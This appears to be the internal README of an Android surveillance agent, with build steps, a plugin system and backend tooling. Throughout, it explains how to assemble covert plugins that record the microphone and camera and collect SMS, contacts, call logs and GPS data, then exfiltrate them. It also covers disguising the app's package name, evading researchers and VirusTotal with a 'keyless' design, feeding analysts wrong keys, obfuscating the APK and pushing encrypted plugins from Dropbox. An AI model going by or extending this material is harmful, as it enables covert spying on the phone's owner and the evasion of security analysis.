## build the agent from sourcecode

Clone the microagent project https://gitlab.local.com/rcs/microandroid/, **_active development is on the dev branch!_**, _master_ may be outdated!

Note: your ssh key must be added in your git lab profile!!
~~~bash
git clone ssh://git@gitlab.local.com:7998/rcs/microandroid.git
git submodule update --init  
# enable lfs https://git-lfs.github.com/
git lfs install
~~~

### LFS special configuration with fucking self signed certificate ad personam
Take your pk12 certificate and key and extract key and certificate in two files:
~~~bash
openssl pkcs12 -in path.p12 -out newfile.crt -clcerts -nokeys
openssl pkcs12 -in path.p12 -out newfile.key -nocerts -nodes
~~~
Then configure git with the following commands:
~~~bash
git config http.sslverify false
git config http.sslcert newfile.crt
git http.sslkey newfile.key
git ssh.sslverify false
~~~

Using [__build.sh__](https://gitlab.local.com/rcs/microandroid/blob/dev/build.sh) builds the core APK, the plugins, performs any embedding (plugins and configuration into the core APK) and optionally push to the device and starts.

 * needs python3 and doxygen

   ~~~
   # install python3 via apt/brew/...
   # install pycrypto
   pip3 install pycryptodome
   # install doxygen via apt/brew/...
   ~~~

- use __-nopush__ to avoid pushing to the device

~~~bash
# note: the release build uses [./testkeystore.jks](https://gitlab.local.com/rcs/microandroid/blob/dev/testkeystore.jks)
# (keystore: test, alias:test, keystore password:123456, password: 123456)
./build.sh <debug|release|clean|generate_buildinfo> [--nopush]
~~~

* ***build.sh MUST BE EXECUTED AT LEAST ONCE ON A CLEAN GIT CHECKOUT, since BuildInfo.java is dynamically generated***
  * this is needed to embed the git commit hash in the core and in each agent plugin
  * if you want to build without using *build.sh* itself, just use it once with the **generate_buildinfo** flag which just generates the needed file, then build as you wish with plain **gradle**.

## development
The microagent git contains a submodule which exposes utilities in order to sync on rcs anonymizer by using the rcs legacy support.

The git is at: https://gitlab.local.com/rcs/usynch

When a change is done in the submodule repo, in order to align the microagent to the last commit the following steps must be taken:
~~~bash
# update submodule in the master branch
# skip this if you use --recurse-submodules

cd [submodule directory]
git pull

# commit the change in main repo
# to use the latest commit in master of the submodule
cd ..
git add [submodule directory]
git commit -m "move submodule to latest commit in master"

# share your changes
git push
~~~

### coding a plugin for the agent
a plugin must be as small as possible and only include code for its own task.

- it's package name __MUST__ be __com.android.wdsec.something__, and it's main class must be named __something__ (lowercase)
  - this is will be renamed to random names using the backend tool __build_agent.py__ ! 
- it's main class must implement __IPlugin__ interface.


### compile-time string encryption
compile time string encryption in the agent is achieved through a **gradle plugin**.

* https://github.com/MichaelRocks/paranoid
  * the core APK and the *command receiver plugins (i.e. modcmdfirebase)* should be the only parts 'attackable' by a researcher if using a **keyless** agent
    * string encryption is only applied to the core APK, the command receiver plugin is anyway encrypted with a random encryption key.
  * **string encryption is just an annoying countermeasure, anyway**.

### build the agent distribution package with gradle
Once the agent has been built from sourcecode, it's possible to generate the distro for uploading onto the backend

~~~bash
# build the agent from source as usual
build.sh <debug|release> --nopush # or ./gradlew app:<assembleDebug|assembleRelease>)
# generates app/build/microagent.zip
./gradlew app:mkdistro -Pflavour=<debug|release>
~~~

## backend customization
The agent is customized backend-side using __backendtools/build_agent.py__, which replaces the _vanilla_ agent plugins set, package name, agent-id, firebase and global configuration with the ones given.

### prerequisites
* python 2.7

  ~~~bash
  pip install whichcraft
  pip install py-execute
  pip install pathlib2
  pip install pycryptodome
  pip install glob2
  ~~~

* __jarsigner__ must be in path (installed with JDK)
* (**apktool** is included)

### build the build_agent.exe windows executable
#### requirements
- Windows 10 virtual machine
- Install python 2.7 https://www.python.org/ftp/python/2.7.16/python-2.7.16.amd64.msi
- Once available install all the requirements
- pip install -r backendtools/requirement.txt
- add to the environment path c:\\Python27 and c:\\Python27\Scripts

#### creating the executable
Open a powershell and cd into the backendtools and modify the build.spec in order to reflect the real path where your files are locate within windows.
Finally issue the following command
~~~bash
pyinstaller -F build.spec --distpath=./
~~~

### usage
~~~bash
(venv) venv ❯ ./build_agent.py --help
usage: build_agent.py [-h] --core_apk CORE_APK --out_apk OUT_APK --plugins
                      PLUGINS [--default_permissions DEFAULT_PERMISSIONS]
                      --cfg CFG --firebase_cfg FIREBASE_CFG --pkg_name
                      PKG_NAME --disposable_key DISPOSABLE_KEY
                      [--clear_disposable_key] --ks KS --kn KN --kp KP --ksp
                      KSP [--hide_tools_output]
                      [--tmp_dir_apktool TMP_DIR_APKTOOL]

build microandroid agent APK

optional arguments:
  -h, --help            show this help message and exit
  --core_apk CORE_APK   the core APK to be used as input
  --out_apk OUT_APK     the final output APK
  --plugins PLUGINS     path to a text file with paths to the plugins APKs to
                        embed (one per line, in the format
                        plugininternalname,assetname,pluginpath
  --default_permissions DEFAULT_PERMISSIONS
                        csv string with a set of default permissions to be
                        added to the core APK manifest, to be used when
                        embedding only modupdate for future plugins upload.
                        consider that READ_PHONE_STATE, ACCESS_NETWORK_STATE
                        and CHANGE_WIFI_STATE are added by default
  --cfg CFG             path to the global configuration.json to be embedded
  --firebase_cfg FIREBASE_CFG
                        path to the firebase configuration json (google-
                        services.json)
  --pkg_name PKG_NAME   the package name to be used
  --disposable_key DISPOSABLE_KEY
                        the disposable key used to encrypt the embedded assets
                        (will be used only on initialization)
  --clear_disposable_key
                        if set, the disposable key is removed from the built
                        APK once encryption is done. the agent is a KEYLESS
                        agent which will do nothing but sitting there, will
                        activate only when the disposable key is sent through
                        the CONFIG command!
  --ks KS               path to the keystore for signing
  --kn KN               the key name (alias) in the keystore
  --kp KP               key password
  --ksp KSP             keystore password
  --hide_tools_output   if set, hides apktool and jarsigner output
  --tmp_dir_apktool TMP_DIR_APKTOOL
                        the temporary directory to use with apktool
~~~

* paths in the __plugins__ file must point to plugins APKs, either debug or release version, taken from the __build__ directory of each plugin on the build machine:

  * each path must be prepended with the plugin **internal name** (which must must be **fixed** and is needed by the plugin system to find the plugin at runtime) and from a randomized **asset name** which is the name given to the plugin file when it is embedded into the main APK **assets**.

    * this is an example **plugins** file which only includes _modcalendar_

      ~~~bash
      # each line starting with # is commented out!
      modcalendar,rwerersa,/home/valerino/work/microandroid/plugins/modcalendar/build/outputs/apk/debug/modcalendar-debug.apk
      #modmic,babubuas,/home/valerino/work/microandroid/plugins/modmic/build/outputs/apk/debug/modmic-debug.apk
      #modgps,bihundfd,/home/valerino/work/microandroid/plugins/modgps/build/outputs/apk/debug/modgps-debug.apk
      #modmedia,vavvaaaerr,/home/valerino/work/microandroid/plugins/modmedia/build/outputs/apk/debug/modmedia-debug.apk
      #modgsmcall,baus3281h,/home/valerino/work/microandroid/plugins/modgsmcall/build/outputs/apk/debug/modgsmcall-debug.apk
      #modinfo,fimimanmu,/home/valerino/work/microandroid/plugins/modinfo/build/outputs/apk/debug/modinfo-debug.apk
      #modcontacts,babausu,/home/valerino/work/microandroid/plugins/modcontacts/build/outputs/apk/debug/modcontacts-debug.apk
      #modcalllog,wqoryqo,/home/valerino/work/microandroid/plugins/modcalllog/build/outputs/apk/debug/modcalllog-debug.apk
      #modsms,4324897rag,/home/valerino/work/microandroid/plugins/modsms/build/outputs/apk/debug/modsms-debug.apk
      #modcamera,gisweyiu148,/home/valerino/work/microandroid/plugins/modcamera/build/outputs/apk/debug/modcamera-debug.apk
      ~~~

* the __disposable_key__ is a key used to encrypt the initial assets (i.e. **modupdate** and an initial **global configuration**. 

  * It is used only once at first initialization to decrypt them, then never used anymore (all the assets, presents and future, are stored on device encrypted with a **device unique key** .

* the __ks, kn, kp, ksp__ stuff are used to re-sign the APK, so a proper certificate should be used

  * refer to Android Developer documentation to generate one.

* **firebase_app_name** by default is set the same as **pkg_name**, if specified is the new *firebase identity* for the app.

* the **cfg** is the **global configuration** json representing the agent configuration (look at the main **README**)

* the __firebase_cfg__ is the configuration file provided by google (usually named **google-services.json**) when generating a new firebase project.

### sample usages

#### build a full agent with all plugins available at install time

~~~bash
./build_agent.py --core_apk ../app/build/outputs/apk/debug/app-debug.apk --out_apk ./out.apk --plugins ./plugins.txt --cfg ../app/configuration.json --firebase_cfg ../app/google-services.json --ks ../testkeystore.jks --kn test --kp 123456 --ksp 123456 --pkg_name com.sqlite.utils --assets_key 1234567890abcdef1234567890abcdef1234567890abcdef12345aa890abcdef --assets_iv 1234567890abcdef12aa567890abcdef --hide_tools_output
~~~

#### build a keyless agent with/without embedded plugins

a keyless agent allows to install an agent which is practically useless to a researcher who finds it, and also protects from **VIRUSTOTAL** and such.

**A researcher will only be able to reverse the minimal code needed to bootstrap the agent, manage the plugins and receive (not process!) a generic command from an endpoint.** 

Once started, the agent basically sits there waiting for a **config** command from the endpoint. 

* This is just a standard **config** with a **disposable_key** parameter in the **core** node.

  ~~~bash
  # sample config command containing the disposable key
  {
      "core": {     "disposable_key":"11223344556677889900aabbccddeeff11223344556677889900aabbccddeeff",
    ...
   	},
      "plugins": {
      	...
      }
  }
  ~~~

  this key is then used to decrypt the embedded plugins (other than the **command receiver** plugin, which uses an hardcoded randomized key).

* Once decrypted, the plugins are re-encrypted and stored with an **unique** per-device key, which is transmitted to the endpoint via the **cmdresult** evidence of the above **config** command.

  ~~~bash
  # sample cmdresult evidence sent by the agent right after receiving (successfully) a config with disposable key
  {
        "cmdid": 12345678,
        "type": "cmdresult",
        "timestamp": 1545397509523,
        "body": {
          "error": 0,
          "device_unique_key": "545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257"
        }
  }
  ~~~

The keyless agent may be prepared with the minimal set of plugins needed to communicate with the remote endpoint (or also with a full set of collection plugins). 

* in this example (*backendtools/dbg_build_empty_for_modmic_nodisposablekey.sh)*, it's prepared with a very minimal set with no collection plugins. 

  * ***This is a really empty agent***. 
  * Once started, only the **command receiver** plugin is decrypted, key for the other plugins is missed.
  * They will be decrypted and started only on receipt of the first **config** with the **disposable key**.
  * Then the agent will be ready to receive other plugins (there's no collection plugins embedded....)

  ~~~bash
  # note the 'use_fallback_key' on the modcmdfirebase line.
  # the command receiver plugin is the only plugin which must be 'exposed' in a keyless agent, since it is needed to receive the initial config command. so, it must use an hardcoded key, which is randomized per agent-instance.
  # in this setting, also the agent configuration is embedded with the same key.
  # every other plugin listed here will be decrypted only once the agent has received the config command with the disposable key. only then the agent will perform the 'full' startup.
  modupdate,wweriuiweorofo,../plugins/modupdate/build/outputs/apk/debug/modupdate-debug.apk
  modcmdfirebase,wrejowfhj411234r,../plugins/modcmdfirebase/build/outputs/apk/debug/modcmdfirebase-debug.apk,use_fallback_key
  modevidence,wrre324809ejowfhj411234r,../plugins/modevidence/build/outputs/apk/debug/modevidence-debug.apk
  modexfiltrate,wrejo2341234wfhj411234r,../plugins/modexfiltrate/build/outputs/apk/debug/modexfiltrate-debug.apk
  ~~~

* in this example instead (*backendtools/dbg_build_apk_with_modmic_only_nodisposablekey.sh*),  the **modmic** plugin is embedded.

  * same as above, but once the **disposable key** is received the agent is ready to collect **mic** evidences.

  ```bash
  # note the 'use_fallback_key' on the modcmdfirebase line.
  # the command receiver plugin is the only plugin which must be 'exposed' in a keyless agent, since it is needed to receive the initial config command. so, it must use an hardcoded key, which is randomized per agent-instance.
  # in this setting, also the agent configuration is embedded with the same key.
  # every other plugin listed here will be decrypted only once the agent has received the config command with the disposable key. only then the agent will perform the 'full' startup.
  modupdate,wweriuiweorofo,../plugins/modupdate/build/outputs/apk/debug/modupdate-debug.apk
  modcmdfirebase,wrejowfhj411234r,../plugins/modcmdfirebase/build/outputs/apk/debug/modcmdfirebase-debug.apk,use_fallback_key
  modevidence,wrre324809ejowfhj411234r,../plugins/modevidence/build/outputs/apk/debug/modevidence-debug.apk
  modexfiltrate,wrejo2341234wfhj411234r,../plugins/modexfiltrate/build/outputs/apk/debug/modexfiltrate-debug.apk
  modmic,rewrlhkjdsfhaewry2346,../plugins/modmic/build/outputs/apk/debug/modmic-debug.apk
  ```

* to create a **keyless** agent, just follow the above steps for **creating an empty agent**, just add the **--clear_disposable_key** parameter in the **build_update.py** commandline.

  * the same **disposable_key** used in the command line must be, of course, sent in the initial **config** command as stated above.

* **ONCE THE SERVER RESPONDS WITH A disposable_key ONCE TO AN AGENT INSTANCE, IT MUST RESPOND TO FURTHER REQUESTS WITH A _WRONG_ KEY !!!!**

  * ***or with no key at all, or not responding at all ....***
  * ***....but using a wrong key would confuse the researcher more :)***


#### build an empty agent to be customized with plugins **after installation**, remotely.

- this is the minimal set of plugins needed for an empty agent

  ~~~bash
  # minimal plugins set for an empty agent
  # use_fallback_key means that such plugin/s will always be decrypted EVEN IF NO DISPOSABLE KEY is there. in this case, the commands receiver plugin needs an hardcoded (randomized per-instance) key to be decrypted in any case. all the other plugins in the minimal set will be decrypted using the disposable key as usual (or hardcoded, or through a config command).
  modupdate,wweriuiweorofo,../plugins/modupdate/build/outputs/apk/debug/modupdate-debug.apk
  modcmdfirebase,wrejowfhj411234r,../plugins/modcmdfirebase/build/outputs/apk/debug/modcmdfirebase-debug.apk,use_fallback_key
  modevidence,wrre324809ejowfhj411234r,../plugins/modevidence/build/outputs/apk/debug/modevidence-debug.apk
  modexfiltrate,wrejo2341234wfhj411234r,../plugins/modexfiltrate/build/outputs/apk/debug/modexfiltrate-debug.apk
  ~~~

- in this example, we plan to install an agent which will use only **modmic**. So we need to build an initial APK with the needed permissions.

  - **this is mandatory from android 6+, since the needed permissions must be both asked runtime and in the manifest**

```bash
# build an empty apk with this commandline
# note the added permissions for modmic (RECORD_AUDIO)
  ./build_agent.py --core_apk ../app/build/outputs/apk/debug/app-debug.apk --out_apk ./out_empty.apk --plugins ./plugins_empty.txt --default_permissions android.permission.RECORD_AUDIO \
  --cfg ../app/configuration.json --firebase_cfg ../app/google-services.json --ks ../testkeystore.jks --kn test --kp 123456 --ksp 123456 \
  --pkg_name com.android.wdsec --disposable_key 11223344556677889900aabbccddeeff11223344556677889900aabbccddeeff --hide_tools_output
 
  (...)
  
  [|] recompiling final apk to ./out_empty.apk
          [-] recompiling from ./__tmpcore using apktool, target=./out_empty.apk
  [|] resigning final apk ./out_empty.apk, packagename=com.android.wdsec
          [-] resigning ./out_empty.apk with jarsigner, keystore=../testkeystore.jks, keyname=test, keypass=123456, storepass=123456
  [-] DONE, output apk=./out_empty.apk !
```

  - now we proceed to install the empty apk, which will basically sit there doing nothing.

  - we then send the agent a configuration with the **config** command, it will reply with a **cmdresult** as usual.

    - the **cmdresult** will contain a  **device_unique_key**, which represents the **AES** key the server must use to send further **update** commands to the target device.

      ~~~bash
         {
            "cmdid": 12345678,
            "type": "cmdresult",
            "timestamp": 1545397509523,
            "body": {
              "error": 0,
              "device_unique_key": "545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257"
            }
          }
      ~~~

  - we're almost done.... now use the provided **buildtools/build_update.py** to generate an APK plugin update to be uploaded somewhere

    ~~~bash
    #!/usr/bin/env sh
    # helper test script to build an encrypted binary suitable to be sent through modupdate
    # this must be the name of the installed core package, we use the original package name here for clarity (but must be changed in production!!!).
    CORE_APK_PACKAGE=com.android.wdsec
    # this must be the plugin internal name from IPlugin.name()
    PLUGIN_INTERNAL_NAME=modmic
    IN_APK=../plugins/modmic/build/outputs/apk/debug/modmic-debug.apk
    OUT_APK=./modmic_update_encrypted.apk
    # this is the DEVICE UNIQUE KEY taken from config command 'cmdresult' evidence
    KEY=545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257
    
    # call build_update.py
    ./build_update.py --in_apk $IN_APK --out_apk $OUT_APK --device_key $KEY --plugin_internal_name $PLUGIN_INTERNAL_NAME \
     --core_apk_pkgname $CORE_APK_PACKAGE --ks ../testkeystore.jks --kn test --kp 123456 --ksp 123456 --hide_tools_output
    
    ~~~

    ~~~bash
    (venv) venv ❯ ./build_update_helper.sh
    
    (...)
    
    [-] replacing base package name "com.android.wdsec" and label "WeyDYqeW" in "./__tmpmodmic.apk/AndroidManifest.xml"
    [|] recompiling plugin: ../plugins/modmic/build/outputs/apk/debug/modmic-debug.apk ==> ./modmic_update_encrypted.apk
            [-] recompiling from ./__tmpmodmic.apk using apktool, target=./modmic_update_encrypted.apk
    [|] resigning plugin apk ./modmic_update_encrypted.apk
            [-] resigning ./modmic_update_encrypted.apk with jarsigner, keystore=../testkeystore.jks, keyname=test, keypass=123456, storepass=123456
    [|] encrypting plugin: ./modmic_update_encrypted.apk, key=545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257, iv=48d8305fcbe748958e6db40c2bea0e51
            [-] encryption using key=545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257, iv=48d8305fcbe748958e6db40c2bea0e51
            [-] processed ./modmic_update_encrypted.apk ==> ./modmic_update_encrypted.apk, original len=29632, compressed len=28329, final len(compressed len + 16 for iv)=28345
    [-] DONE, processed plugin APK in ./modmic_update_encrypted.apk !
    [-] DONE, output plugin apk=./modmic_update_encrypted.apk
    ~~~

  - put the resulting APK on dropbox or something, and issue a proper **modupdate -> start** command

    ```bash
    2018-12-21 13:56:25.054 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.PluginManager/initOrStartOrEnablePlugin,PluginManager.java,146)** permission GRANTED to START plugin modupdate
    2018-12-21 13:56:25.055 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.modupdate.modupdate/start,modupdate.java,49)** 
    2018-12-21 13:56:25.056 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.libutils.PluginBase/start,PluginBase.java,99)** start!
    2018-12-21 13:56:25.058 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.libutils.PluginBase/start,PluginBase.java,112)** PLUGIN START PARAMS for modupdate:
        ----
        {
          "type": "remotecmd",
          "cmdid": 12345678,
          "timestamp": 1542884753570,
          "body": {
            "target": "modupdate",
            "name": "start",
            "module": "modmic",
            "url": "https:\/\/dl.dropboxusercontent.com\/s\/cu4oglof817pk72\/modmic_update_encrypted.apk?dl=0"
          }
        }
        ----
    2018-12-21 13:56:25.060 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.modupdate.modupdate/updatePlugin,modupdate.java,118)** updating/installing plugin: modmic
    2018-12-21 13:56:25.890 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.libutils.HttpUtils/httpDownload,HttpUtils.java,61)** download completed, size=28345
    2018-12-21 13:56:25.904 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.modupdate.modupdate/updatePlugin,modupdate.java,137)** update file downloaded, iv=48d8305fcbe748958e6db40c2bea0e51!
    2018-12-21 13:56:25.913 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.modupdate.modupdate/updatePlugin,modupdate.java,156)** updating plugin modmic, path=/data/user/0/com.android.wdsec/files/plugins/modmic
    2018-12-21 13:56:25.915 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.PluginManager/uninstallPlugin,PluginManager.java,431)** uninstalling plugin: /data/user/0/com.android.wdsec/files/plugins/modmic
    2018-12-21 13:56:25.916 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.libutils.PluginBase/stop,PluginBase.java,154)** stop!
    2018-12-21 13:56:25.918 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.PluginManager/uninstallPlugin,PluginManager.java,439)** remove plugin from list: modmic
    2018-12-21 13:56:25.921 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.PluginManager/uninstallPlugin,PluginManager.java,451)** deleting plugin file: /data/user/0/com.android.wdsec/files/plugins/modmic!
    2018-12-21 13:56:25.923 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.PluginManager/uninstallPlugin,PluginManager.java,451)** deleting plugin file: /data/user/0/com.android.wdsec/files/plugins/modmic.tmp.prof!
    2018-12-21 13:56:25.937 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.support.AssetUtils/assetWriteEncryptedWithDeviceKeyToFile,AssetUtils.java,175)** encrypting to /data/user/0/com.android.wdsec/files/plugins/modmic, using devicekey=545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257, iv=4c6180b8eecb4ff7ec718abdbee6f0f6
    2018-12-21 13:56:25.956 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.modupdate.modupdate/updatePlugin,modupdate.java,197)** written plugin /data/user/0/com.android.wdsec/files/plugins/modmic !
    2018-12-21 13:56:25.967 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.support.AssetUtils/assetReadEncryptedWithDeviceKeyFromFile,AssetUtils.java,153)** decrypting /data/user/0/com.android.wdsec/files/plugins/modmic, using devicekey=545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257, iv=4c6180b8eecb4ff7ec718abdbee6f0f6
    2018-12-21 13:56:25.975 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.PluginManager/loadPlugin,PluginManager.java,342)** decrypting plugin to /data/user/0/com.android.wdsec/files/plugins/modmic.tmp
    2018-12-21 13:56:25.997 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.PluginManager/loadPlugin,PluginManager.java,364)** loaded plugin: modmic
    2018-12-21 13:56:26.007 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.support.AssetUtils/assetReadEncryptedWithDeviceKeyFromFile,AssetUtils.java,153)** decrypting /data/user/0/com.android.wdsec/files/cfg.bin, using devicekey=545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257, iv=c139239623d7834b43f9e8d36fcd3362
    2018-12-21 13:56:26.017 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.PluginManager/initOrStartOrEnablePlugin,PluginManager.java,143)** permission GRANTED to INIT plugin modmic
    2018-12-21 13:56:26.019 23571-24061/com.android.wdsec W/SECDBG: **WARNING,TID:8343,com.android.wdsec.PluginManager/initOrStartOrEnablePlugin,PluginManager.java,163)** plugin modmic uninitialized/to be reinitialized, actionType=1, proceeding with initialization!
    2018-12-21 13:56:26.022 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.libutils.PluginBase/init,PluginBase.java,39)** modmic initialized with cfg={"core":{"communication_key":"aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899","comm_addresses":["http:\/\/bla\/bla","http:\/\/blu\/blu","http:\/\/bli\/bli"]},"plugins":{"modgsmcall":{"quality":0,"incoming_on_ringing":true},"modcamera":{"allow_auto":true,"use_autofocus":true,"quality":0,"mode":0},"modgps":{"allow_auto":false,"interval":60}}}
    2018-12-21 13:56:26.024 23571-24061/com.android.wdsec I/SECDBG: **INFO,TID:8343,com.android.wdsec.libutils.PluginBase/stop,PluginBase.java,154)** stop!
    2018-12-21 13:56:26.025 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.CommandManager/processCommand,CommandManager.java,112)** reporting command result: 0)
    2018-12-21 13:56:26.037 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.support.AssetUtils/assetReadEncryptedWithDeviceKeyFromFile,AssetUtils.java,153)** decrypting /data/user/0/com.android.wdsec/files/cfg.bin, using devicekey=545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257, iv=c139239623d7834b43f9e8d36fcd3362
    2018-12-21 13:56:26.044 23571-24061/com.android.wdsec D/SECDBG: **VERBOSE,TID:8343,com.android.wdsec.EvidenceManager/evidenceAdd,EvidenceManager.java,75)** EVIDENCE DUMP:
        ----
        {
          "cmdid": 12345678,
          "type": "cmdresult",
          "timestamp": 1545396986026,
          "body": {
            "error": 0
          }
        }
        ----
    ```

#### build a full APK update

* this is not recommended, although supported by **modupdate**, since it will ask confirmation to the user!

```bash
#!/usr/bin/env sh
# helper test script to build a full apk update  suitable to be sent through modupdate
# do not modify these directly, make a copy and hardcode your values!
# we are using the vanilla apk here, just to test .... just, it must be the SAME name used for the pre-existing APK AND SIGNED WITH THE SAME KEY/KEYSTORE, or the update won't work!
IN_APK=../app/build/outputs/apk/debug/app-debug.apk
OUT_APK=./app_encrypted.apk
# this is the DEVICE UNIQUE KEY (changes with device!)
KEY=545c5b6dccbc8980aaa0f148d16c1247f188638a60edf8f37228ffdf2695f257

# prepare a full apk as usual with build_agent.py, then simply encrypt it using a random iv
./encrypt_decrypt.py --infile $IN_APK --outfile $OUT_APK --key $KEY --random_iv --mode encrypt
```

- put the resulting APK on dropbox or something, and issue a proper **modupdate -> start** command (using **'*'** as **module** to trigger the full APK update)

## obfuscate the resulting release build with obfuscapk
after customization, optionally the resulting release build could be obfuscated through obfuscapk.
~~~
git clone https://github.com/ClaudiuGeorgiu/Obfuscapk
cd Obfuscapk

# create the virtualenv (optional)
virtualenv -p python3.7 venv
source venv/bin/activate

# install dependencies
pip3 install -r src/requirements.txt
~~~

### use obfuscapk
~~~
# needs apktool,zipalign environment variables set, plus jarsigner and keytool in path
export APKTOOL_PATH=/Users/valerino/bin/apktool.sh
export ZIPALIGN_PATH=/Users/valerino/Library/Android/sdk/build-tools/29.0.1/zipalign

# replace the keystore with a fresh one
#rm ./src/obfuscapk/resources/obfuscation_keystore.jks
#keytool -genkey -v -keystore ./src/obfuscapk/resources/obfuscation_keystore.jks -validity 10000 -keysize 2048 -sigalg SHA1withRSA -keyalg RSA -alias obfuscation_key -keypass obfuscation_password -storepass obfuscation_password -dname "CN=something, OU=something, O=something, L=something, S=something, C=something"

# obfuscate the release build ./app-release.apk, outputs ./out.apk (using any other obfuscator combinations lead to crash)
cd src
python3 -m obfuscapk.cli -p -d ./out.apk -w ./tmp -o ArithmeticBranch -o MethodOverload -o Goto -o Reflection -o AdvancedReflection -o Reorder -o RandomManifest -o Rebuild -o NewSignature -o NewAlignment ./app-release.apk 
~~~

